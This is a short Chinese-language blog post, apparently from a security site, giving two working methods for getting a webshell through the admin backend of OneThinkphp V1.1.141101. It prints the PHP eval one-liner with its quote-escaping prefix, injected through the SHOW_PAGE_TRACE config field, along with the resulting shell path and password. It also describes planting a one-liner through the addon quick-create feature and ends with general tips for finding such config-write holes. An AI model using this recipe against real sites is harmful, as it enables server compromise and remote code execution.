OneThinkphp管理平台V1.1.141101版本后台getshell

OneThinkphp管理平台V1.1.141101版本后台getshell,很早之前读代码,发现的
第一个方法是? 在runtime文件夹可以访问的情况下可以尝试用这个办法
访问 http://127.0.0.1:85/admin.php?s=/Config/index.html? ?这个路径 找到 SHOW_PAGE_TRACE
?
SHOW_PAGE_TRACE
配置类型
字符
?
?
配置值(配置值)

";}
@eval($_POST['bugscaner']);//
注意上面代码那个回车很重要!
提交
webshell地址? http://127.0.0.1:85/Runtime/Temp/95a1fe934b68ebfee8468bf0bc4f0000.php? ?密码? bugscaner
?
第二个方法是? 在runtime文件夹不可以访问的情况下尝试使用下面的方法
插件管理? http://127.0.0.1:85/admin.php?s=/Addons/index.html
?
添加插件? ? 快速创建
?
*标识名? ?logging
?
是否需要配置? ?选择之后 写入一句话
?
?
确定即可
?
一句话路径为
http://127.0.0.1:85/Addons/logging/config.php



题外话,通用的挖怎么拿webshell的方式,可以先找管理系统的配置文件,不是写入数据库那种,是写入php文件的,然后跟踪调用,配置文件写入的函数,一步一步逆向,或者直接黑盒测试,逐渐突破'和" ,即可达到拿webshell的目的,在开发代码的时候一定要注意!




本文章为 www.bugscaner.com 原创文章,转载请注明出处!

您可能还会对下面的文章感兴趣: